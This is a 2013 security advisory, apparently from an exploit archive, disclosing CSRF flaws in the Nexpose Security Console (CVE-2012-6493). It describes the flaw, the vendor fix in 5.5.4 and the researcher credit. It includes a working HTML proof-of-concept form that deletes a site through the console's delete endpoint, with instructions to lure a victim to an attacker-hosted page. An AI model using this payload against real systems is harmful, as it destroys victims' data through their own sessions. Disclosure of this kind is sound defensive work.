Skip to content
cyberexploits
webappmultipletext

Nexpose Security Console - Cross-Site Request Forgery

Nexpose Security Console - Cross-Site Request Forgery

Published on 2013-01-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/webapps/23924.txt7eac4c3a
raw
Product: Nexpose Security Console

Vendor: Rapid7

Version: < 5.5.3

Tested Version: 5.5.1

Vendor Notified Date: December 19, 2012

Release Date: January 2, 2013

Risk: High

Authentication: None required

Remote: Yes



Description:

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose 

Security Console 5.5.3 and below allow remote attackers to submit 

actions on a legitimate user’s behalf.

By not properly checking each URL, an attacker can execute requests on 

behalf of a legitimate user.

If an authenticated user is tricked into visiting a specially crafted 

page, it may be possible to perform user-initiated actions on the web 

application using the victim’s established session.

Successful exploitation of this vulnerability resulted in deleting scan 

data and sites during the proof-of-concept.



Exploit steps for proof-of-concept:

1.      Create an external site/page: 

http://attackersite.com/nexpose-csrf.htm that contains:

[code]

<html>

   <!-- Nexpose CSRF PoC -->

   <body>

     <form 

action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" 

method="POST"  enctype="multipart/form-data">

       <input type="submit" value="delete site" />

     </form>

     <script>

       //document.forms[0].submit(); //uncomment to auto-submit

     </script>

   </body>

</html>

[/code]

2.      Lure victim to http://attackersite.com/nexpose-csrf.htm.

3.      Site with ID 1 is deleted when form is submitted.



Vendor Notified: Yes

Vendor Response: Quickly escalated and resolved.

Vendor Update: Remediated in 5.5.4.



Reference:

CVE-2012-6493

https://community.rapid7.com/docs/DOC-2065#release5

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)



Credit:

Robert Gilbert

HALOCK Security Labs
View on GitHub